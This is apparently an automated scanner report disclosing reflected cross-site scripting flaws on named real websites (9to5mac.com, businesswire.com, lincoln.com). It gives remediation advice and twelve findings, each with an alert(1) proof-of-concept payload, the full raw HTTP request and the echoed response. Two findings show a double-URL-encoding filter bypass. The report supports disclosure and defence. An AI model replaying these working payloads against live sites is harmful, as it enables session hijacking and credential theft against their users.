XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05212011-01

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.9to5mac.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b3f"><script>alert(1)</script>3e058265935 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48b3f\"><script>alert(1)</script>3e058265935 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?48b3f"><script>alert(1)</script>3e058265935=1 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:34:33 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: PHPSESSID=cf18spmc167geqejfopom63db6; path=/
Set-Cookie: X-Mapping-nollkmcj=5FD4FB526FDDB0926B78A11572F4BBB7; path=/
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 69885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/?48b3f\"><script>alert(1)</script>3e058265935=1" />
...[SNIP]...

1.2. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57180"><script>alert(1)</script>07531661609 was submitted in the REST URL parameter 1. This input was echoed as 57180\"><script>alert(1)</script>07531661609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content57180"><script>alert(1)</script>07531661609/plugins/sociable/sociable.css?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:20 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:21 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content57180\"><script>alert(1)</script>07531661609/plugins/sociable/sociable.css?ver=3.1.2" />
...[SNIP]...

1.3. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0583"><script>alert(1)</script>da53712e5a1 was submitted in the REST URL parameter 2. This input was echoed as f0583\"><script>alert(1)</script>da53712e5a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf0583"><script>alert(1)</script>da53712e5a1/sociable/sociable.css?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:22 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:22 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/pluginsf0583\"><script>alert(1)</script>da53712e5a1/sociable/sociable.css?ver=3.1.2" />
...[SNIP]...

1.4. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a39"><script>alert(1)</script>dcd3306fa13 was submitted in the REST URL parameter 3. This input was echoed as 21a39\"><script>alert(1)</script>dcd3306fa13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable21a39"><script>alert(1)</script>dcd3306fa13/sociable.css?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:24 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:24 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/sociable21a39\"><script>alert(1)</script>dcd3306fa13/sociable.css?ver=3.1.2" />
...[SNIP]...

1.5. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1a2"><script>alert(1)</script>5c0b8d9b4bf was submitted in the REST URL parameter 4. This input was echoed as cd1a2\"><script>alert(1)</script>5c0b8d9b4bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/sociable.csscd1a2"><script>alert(1)</script>5c0b8d9b4bf?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:25 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:25 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/sociable/sociable.csscd1a2\"><script>alert(1)</script>5c0b8d9b4bf?ver=3.1.2" />
...[SNIP]...

1.6. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cbf1"><script>alert(1)</script>b566cce6b2 was submitted in the REST URL parameter 1. This input was echoed as 5cbf1\"><script>alert(1)</script>b566cce6b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content5cbf1"><script>alert(1)</script>b566cce6b2/plugins/wp-paginate/wp-paginate.css?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:20 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:20 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content5cbf1\"><script>alert(1)</script>b566cce6b2/plugins/wp-paginate/wp-paginate.css?ver=1.2.3" />
...[SNIP]...

1.7. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a29"><script>alert(1)</script>543e9a4a757 was submitted in the REST URL parameter 2. This input was echoed as 56a29\"><script>alert(1)</script>543e9a4a757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins56a29"><script>alert(1)</script>543e9a4a757/wp-paginate/wp-paginate.css?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:22 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:22 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins56a29\"><script>alert(1)</script>543e9a4a757/wp-paginate/wp-paginate.css?ver=1.2.3" />
...[SNIP]...

1.8. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c35c"><script>alert(1)</script>f982dad186 was submitted in the REST URL parameter 3. This input was echoed as 7c35c\"><script>alert(1)</script>f982dad186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-paginate7c35c"><script>alert(1)</script>f982dad186/wp-paginate.css?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:23 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:24 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/wp-paginate7c35c\"><script>alert(1)</script>f982dad186/wp-paginate.css?ver=1.2.3" />
...[SNIP]...

1.9. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.9to5mac.com
Path:	/wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9628"><script>alert(1)</script>f5d51aa8d7e was submitted in the REST URL parameter 4. This input was echoed as d9628\"><script>alert(1)</script>f5d51aa8d7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-paginate/wp-paginate.cssd9628"><script>alert(1)</script>f5d51aa8d7e?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:25 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:25 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/wp-paginate/wp-paginate.cssd9628\"><script>alert(1)</script>f5d51aa8d7e?ver=1.2.3" />
...[SNIP]...

1.10. http://www.businesswire.com/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businesswire.com
Path:	/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1fe35%253cscript%253ealert%25281%2529%253c%252fscript%253e0d8d6a33c35 was submitted in the REST URL parameter 3. This input was echoed as 1fe35<script>alert(1)</script>0d8d6a33c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/201105180052431fe35%253cscript%253ealert%25281%2529%253c%252fscript%253e0d8d6a33c35/en/Cameron-Health-Completes-107-Million-Equity-Financing HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:23:30 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=Bb69NXnCYWVX81xqDhMrmYbzLGmThSCc60Snzj64Fhlm12mBVRtR!1755553180!-1793459085; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 201105180052431fe35<script>alert(1)</script>0d8d6a33c35 and language = en.</span>
...[SNIP]...

1.11. http://www.businesswire.com/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businesswire.com
Path:	/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c4e3b%253cscript%253ealert%25281%2529%253c%252fscript%253ec1d8cba65e7 was submitted in the REST URL parameter 4. This input was echoed as c4e3b<script>alert(1)</script>c1d8cba65e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110518005243/enc4e3b%253cscript%253ealert%25281%2529%253c%252fscript%253ec1d8cba65e7/Cameron-Health-Completes-107-Million-Equity-Financing HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:23:43 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=wbfTNXnPxNzz7YSNfQwZMGlPmVzFjzRZpcSDYysT2D3bDMkrSyy6!1755553180!-1793459085; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110518005243 and language = enc4e3b<script>alert(1)</script>c1d8cba65e7.</span>
...[SNIP]...

1.12. http://www.lincoln.com/crossovers/mkx/experiencemkx/ [bannerid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lincoln.com
Path:	/crossovers/mkx/experiencemkx/

Issue detail

The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8964f"%3balert(1)//88a261e764f was submitted in the bannerid parameter. This input was echoed as 8964f";alert(1)//88a261e764f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /crossovers/mkx/experiencemkx/?bannerid=5383750|62420317|419606628964f"%3balert(1)//88a261e764f&referrer=AmericaOnline(AOL) HTTP/1.1
Host: www.lincoln.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47
X-Akamai-GTMO: NGBS
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: max-age=86400
Expires: Sat, 21 May 2011 21:48:37 GMT
Date: Fri, 20 May 2011 21:48:37 GMT
Connection: close
Vary: Accept-Encoding
